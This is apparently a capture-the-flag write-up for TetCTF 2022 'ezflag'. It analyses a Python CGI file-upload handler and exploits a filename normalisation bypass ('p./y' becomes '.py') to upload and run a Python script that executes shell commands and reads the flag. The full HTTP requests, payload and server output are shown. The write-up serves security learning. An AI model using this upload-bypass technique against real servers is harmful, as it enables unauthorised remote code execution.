Tags: python cgi
Rating: 5.0
The full detailed writeup including part 2 is at https://nandynarwhals.org/tetctf-2022-ezflag/.
Unpacking the tar file provided yields the following web application deployment files:
```console
$ tar xvf ezflag_109ff451f9d11258d01594c77aae131c.tar.gz
x ezflag/conf/
x ezflag/conf/lighttpd.conf
x ezflag/conf/nginx-site.conf
x ezflag/www/
x ezflag/www/html/
x ezflag/www/cgi-bin/
x ezflag/www/upload/
x ezflag/www/upload/shell.py
x ezflag/www/cgi-bin/upload.py
x ezflag/www/html/upload.html
```
The `upload.py` file implements the main web application logic through CGI. Breaking it up, we have
the main function that performs basic authentication check and if it passes, dispatches to the right
handler.
```python
#!/usr/bin/env python3
import os
import cgi
import base64
import socket
def write_header(key, value) -> None:
print('{:s}: {:s}'.format(key, value))
def write_status(code, msg) -> None:
print('Status: {:d} {:s}'.format(code, msg), end='\n\n')
def write_location(url) -> None:
print('Location: {:s}'.format(url), end='\n\n')
...
if __name__ == '__main__':
if not check_auth():
write_header('WWW-Authenticate', 'Basic')
write_status(401, 'Unauthorized')
else:
method = os.environ.get('REQUEST_METHOD')
if method == 'POST':
handle_post()
elif method == 'GET':
handle_get()
else:
write_status(405, 'Method Not Allowed')
```
The basic authentication check parses the header and then forwards the `username` and `password` as
newline terminated strings to a server listening on port `4444` on the remote localhost. It checks
if the first byte sent back is a `'Y'`. We are given the username and password of `admin:admin` so
we'll just use these credentials for now.
```python
def check_auth() -> bool:
auth = os.environ.get('HTTP_AUTHORIZATION')
if auth is None or len(auth) < 6 or auth[0:6] != 'Basic ':
return False
auth = auth[6:]
try:
data = base64.b64decode(auth.strip().encode('ascii')).split(b':')
if len(data) != 2:
return False
username = data[0]
password = data[1]
if len(username) > 8 or len(password) > 16:
return False
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 4444))
s.settimeout(5)
s.send(username + b'\n' + password + b'\n')
result = s.recv(1)
s.close()
if result == b'Y':
return True
return False
except:
return False
```
The `GET` handler is simple, it just prints the contents of an `upload.html` HTML file in the
response.
```python
def handle_get() -> None:
with open('../html/upload.html', 'rb') as f:
dat = f.read()
write_header('Content-Type', 'text/html')
write_header('Content-Length', str(len(dat)))
write_status(200, 'OK')
print(dat.decode('utf-8'), end=None)
```
The `POST` handler is more interesting. It allows for the writing of an arbitrary file to an
`upload` directory with some constraints on the filename. It checks for the existence of `..` or
`.py` in the filename and rejects it if found. Additionally, it also 'normalises' the filename by
removing all occurrences of `'./'`.
```python
def valid_file_name(name) -> bool:
if len(name) == 0 or name[0] == '/':
return False
if '..' in name:
return False
if '.py' in name:
return False
return True
def handle_post() -> None:
fs = cgi.FieldStorage()
item = fs['file']
if not item.file:
write_status(400, 'Bad Request')
return
if not valid_file_name(item.filename):
write_status(400, 'Bad Request')
return
normalized_name = item.filename.strip().replace('./', '')
path = ''.join(normalized_name.split('/')[:-1])
os.makedirs('../upload/' + path, exist_ok=True)
with open('../upload/' + normalized_name, 'wb') as f:
f.write(item.file.read())
write_location('/uploads/' + normalized_name)
```
Assuming we want to be able to write `.py` files, we can abuse the normalisation process to
transform the filename to one that ends with `.py` after the check occurs. For example:
```python
In [486]: name = "attack.p./y"
...: assert ".py" not in name
...: normalized_name = name.strip().replace('./', '')
...: assert ".py" in normalized_name
...: print(normalized_name)
attack.py
```
If we look in `nginx-site.conf`, we can see that the `/upload/` directory that we can upload files
to is mapped to the `/uploads/` path on the web server.
```
server {
listen 80;
listen [::]:80;
location / {
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_pass http://127.0.0.1:8080/cgi-bin/upload.py;
}
location /uploads/ {
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_pass http://127.0.0.1:8080/uploads/;
}
}
```
Within the `lighttpd.conf` configuration file, we can see that `.py` files are executed with the
`/usr/bin/python3` interpreter with CGI. Thus, if we write a `.py` file, we can simply visit the
path and it should execute our arbitrary code.
```
...
alias.url += ( "/cgi-bin" => "/var/www/cgi-bin" )
alias.url += ( "/uploads" => "/var/www/upload" )
cgi.assign = ( ".py" => "/usr/bin/python3" )
```
Putting this together, we can create our exploit python script on the server with the following
`POST` request, including the `admin:admin` basic authentication header.
```
POST / HTTP/1.1
Host: 18.191.117.63:9090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------27015668151794350363716216349
Content-Length: 315
Origin: http://18.191.117.63:9090
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://18.191.117.63:9090/
Upgrade-Insecure-Requests: 1
-----------------------------27015668151794350363716216349
Content-Disposition: form-data; name="file"; filename="amon_34123.p./y"
Content-Type: application/octet-stream
#!/usr/bin/env python3
import os
print(os.system("ls -la /;cat /flag"))
-----------------------------27015668151794350363716216349--
```
Next, to trigger the script, we just simply visit the `/uploads/amon_34123.py` script path.
```
GET /uploads/amon_34123.py HTTP/1.1
Host: 18.191.117.63:9090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Upgrade-Insecure-Requests: 1
```
In the response, we can see that the `flag` as well as some other interesting file such as `flag2`
and `auth` are located at the `/` path. We also obtain our first flag.
```
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 01 Jan 2022 06:58:00 GMT
Content-Length: 1636
Connection: close
total 864
drwxr-xr-x 1 root root 4096 Jan 1 00:06 .
drwxr-xr-x 1 root root 4096 Jan 1 00:06 ..
-rwxr-xr-x 1 root root 0 Jan 1 00:06 .dockerenv
-r-xr--r-- 1 daemon daemon 802768 Dec 31 22:39 auth
lrwxrwxrwx 1 root root 7 Oct 6 16:47 bin -> usr/bin
drwxr-xr-x 2 root root 4096 Apr 15 2020 boot
drwxr-xr-x 5 root root 340 Jan 1 03:44 dev
drwxr-xr-x 1 root root 4096 Jan 1 00:06 etc
-r--r--r-- 1 root root 41 Jan 1 00:03 flag
-r-------- 1 daemon daemon 41 Jan 1 00:03 flag2
drwxr-xr-x 2 root root 4096 Apr 15 2020 home
lrwxrwxrwx 1 root root 7 Oct 6 16:47 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Oct 6 16:47 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Oct 6 16:47 lib64 -> usr/lib64
lrwxrwxrwx 1 root root 10 Oct 6 16:47 libx32 -> usr/libx32
drwxr-xr-x 2 root root 4096 Oct 6 16:47 media
drwxr-xr-x 2 root root 4096 Oct 6 16:47 mnt
drwxr-xr-x 2 root root 4096 Oct 6 16:47 opt
dr-xr-xr-x 995 root root 0 Jan 1 03:44 proc
drwx------ 1 root root 4096 Jan 1 03:40 root
drwxr-xr-x 1 root root 4096 Jan 1 00:06 run
-rwxr-xr-x 1 1000 1000 189 Dec 31 15:29 run.sh
lrwxrwxrwx 1 root root 8 Oct 6 16:47 sbin -> usr/sbin
drwxr-xr-x 2 root root 4096 Oct 6 16:47 srv
dr-xr-xr-x 13 root root 0 Jan 1 03:44 sys
drwxrwxrwt 1 root root 4096 Jan 1 06:57 tmp
drwxr-xr-x 1 root root 4096 Jan 1 00:05 usr
drwxr-xr-x 1 root root 4096 Jan 1 00:05 var
TetCTF{65e95f4eacc1fe7010616e051f1c610a}
0
```
**Flag:** `TetCTF{65e95f4eacc1fe7010616e051f1c610a}`
